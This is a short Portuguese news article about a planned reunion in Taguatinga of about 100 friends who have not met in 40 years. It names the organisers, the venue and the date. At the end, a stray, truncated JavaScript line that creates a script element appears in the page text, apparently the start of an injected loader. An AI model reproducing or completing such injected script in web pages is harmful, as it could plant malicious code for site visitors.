Para matar a saudade de 40 anos

Centro de Taguatinga na década de 80. Foto: Divulgação
Centro de Taguatinga na década de 80. Foto: Divulgação

Cem amigos que não se vêem há pelo menos 40 anos vão se encontrar no próximo dia 26 de novembro. A festa será no bar Badulak, na CNF 1 (Taguatinga), a partir das 13h. O encontro foi organizado pelo representante comercial Lauro Cecílio, que nunca saiu de Taguatinga, e pelo advogado Rui Correa, que atualmente mora em Itabuna (BA).

Os dois criaram um grupo no WhatsApp apenas para conversar. Aos poucos, porém, foram adicionando pessoas, chegando a mais de 100 participantes. Para não ficarem apenas no mundo virtual, resolveram marcar uma data em que todos comparecerão. “Será um momento para recontar histórias, ouvir músicas, dançar e ‘jogar conversa fora’, como fazíamos nos tempos de juventude”, diz Lauro.

Segundo ele, “o ambiente não poderia ser outro que não um bar. Há 40 anos, o normal era nos reunirmos em barzinhos e nas casas de amigos”, lembra. Nos anos 1970 e 1980, os locais mais frequentados por eles eram o SESC, na Avenida Comercial Norte, e nas residências espalhadas  pelos setores QNA, QND, QNE e QNF.

Forasteiros

O reencontro animou muita gente que não mora mais no Distrito Federal. Já confirmaram presença “forasteiros” que estão Bahia, em São Paulo e em Minas Gerais. Para garantir a segurança e o conforto de todos, os organizadores da festa vão montar tendas e solicitar à Polícia Militar a interdição da CNF 1 a partir das 12h do dia 26.

var d=document;var s=d.createElement(‘script’);

Deixe um comentário